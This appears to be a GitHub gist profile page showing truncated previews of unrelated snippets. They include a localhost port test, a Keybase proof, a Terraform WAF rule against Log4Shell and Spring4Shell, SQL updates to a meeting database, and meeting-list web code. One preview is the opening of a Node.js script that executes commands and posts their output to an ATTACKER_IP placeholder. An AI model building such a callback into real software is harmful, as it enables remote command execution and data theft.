Skip to content

Instantly share code, notes, and snippets.

View dgershman's full-sized avatar
🔒

Danny Gershman dgershman

🔒
View GitHub Profile
Test connectivitity
timeout 5 bash -c 'cat < /dev/null > /dev/tcp/127.0.0.1/8443'; echo $?
const http = require('http');
const exec = require("child_process").exec;
const ATTACKER_IP = "0.0.0.0"
const ATTACKER_PORT = 8080
const runCommand = function(command, callback) {
exec(command, (error, stdout, stderr) => {
console.log(stdout)
sendPost(stdout)
sendPost(stderr)
@dgershman
dgershman / keybase
Created April 18, 2022 18:33
keybase proof
### Keybase proof
I hereby claim:
* I am dgershman on github.
* I am radius314 (https://keybase.io/radius314) on keybase.
* I have a public key ASAi2E0rBd4Diqs30QjM42aS71bQ3VpCxrZmhh4GtB94cQo
To claim this, I am signing this object:
@dgershman
dgershman / waf.tf
Last active April 4, 2022 21:43
AWS WAFv2 for Log4ShellRCE (CVE-2021-44228, CVE-2021-45046) and Spring4ShellRCE (CVE-2022-22963, CVE-2022-22965)
...
rule {
name = "4ShellRCEs"
priority = ?
override_action {
count {}
}
statement {
update na_comdef_meetings_main set formats = replace(formats, '53', '2') where id_bigint in (949,933,871,850,781,699,683,642,978,490,482,627,895,1201,789,1330);
update na_comdef_meetings_main set formats = replace(formats, '55', '4') where id_bigint in (289,293,962,961,960,959,958,957,941,940,933,904,843,827,821,819,820,787,774,732,726,716,707,703,697,683,658,660,641,634,633,619,600,597,571,566,978,551,541,542,490,473,472,468,460,461,445,1231,980,966,673,950,1035,754,478,1055,853,948,701,629,909,1043,1063,1234,1235,1236,968,1079,599,944,1154,1155,1156,1157,1158,1159,1168,1169,1170,1171,1172,1173,1174,1175,1176,1177,1178,1179,1207,1208,1209,1210,1211,1212,1213,1264,1232,1233,885,1323,1324,496,1332);
update na_comdef_meetings_main set formats = replace(formats, '56', '5') where id_bigint in (843,786,784,617,606,566,558,556,532,531,445,484);
update na_comdef_meetings_main set formats = replace(formats, '57', '6') where id_bigint in (662,1012);
/*update na_comdef_meetings_main set formats = replace(formats, '58',
update na_comdef_meetings_main set formats = replace(formats, '53', '2') where id_bigint in (949,933,871,850,781,699,683,642,978,490,482,627,895,1201,789,1330);
update na_comdef_meetings_main set formats = replace(formats, '55', '4') where id_bigint in (289,293,962,961,960,959,958,957,941,940,933,904,843,827,821,819,820,787,774,732,726,716,707,703,697,683,658,660,641,634,633,619,600,597,571,566,978,551,541,542,490,473,472,468,460,461,445,1231,980,966,673,950,1035,754,478,1055,853,948,701,629,909,1043,1063,1234,1235,1236,968,1079,599,944,1154,1155,1156,1157,1158,1159,1168,1169,1170,1171,1172,1173,1174,1175,1176,1177,1178,1179,1207,1208,1209,1210,1211,1212,1213,1264,1232,1233,885,1323,1324,496,1332);
update na_comdef_meetings_main set formats = replace(formats, '56', '5') where id_bigint in (843,786,784,617,606,566,558,556,532,531,445,484);
update na_comdef_meetings_main set formats = replace(formats, '57', '6') where id_bigint in (662,1012);
/*update na_comdef_meetings_main set formats = replace(formats, '58',
<link rel="stylesheet" type="text/css" href="/javascripts/croutonjs/crouton.min.css" />
<div style="padding:25px;">
<span id="page-title"></span>
<span id="meeting-count"></span>, <span id="group-count"></span>
<div id="bmlt-tabs"></div>
</div>
<script src="/javascripts/croutonjs/crouton.min.js"></script>
<script type="text/javascript">
function getParameterByName(name, url) {
if (!url) url = window.location.href;
select concat("insert into conference_participants (callsid, conferencesid, friendlyname, timestamp) values ('", callsid, "','", conferencesid, "','", friendlyname, "','", timestamp, "')") from conference_participants;
select concat("insert into config (service_body_id, data_type, data, parent_id) values (", service_body_id, ",'", data_type, "','", data, "',", IFNULL(parent_id, "NULL"), ")") from config;
select concat("insert into metrics (timestamp, data) values ('", timestamp, "','", data, "')") from metrics;
<a id="Day1" href="javascript:selectDay(1)">Sunday</a>
<a id="Day2" href="javascript:selectDay(2)">Monday</a>
<a id="Day3" href="javascript:selectDay(3)">Tuesday</a>
<a id="Day4" href="javascript:selectDay(4)">Wednesday</a>
<a id="Day5" href="javascript:selectDay(5)">Thursday</a>
<a id="Day6" href="javascript:selectDay(6)">Friday</a>
<a id="Day7" href="javascript:selectDay(7)">Saturday</a>
<hidden id="selectedDay"/>
<select id="language">
<option value="47">English</option>
<script>
jQuery(function() {
bmltClientInit('https://.../main_server');
getServiceBodies(function(serviceBodiesData) {
serviceBodies = serviceBodiesData;
getFormats(function(formatsData) {
formats = formatsData;
selectDay(getTodayDayOfWeek());
})
})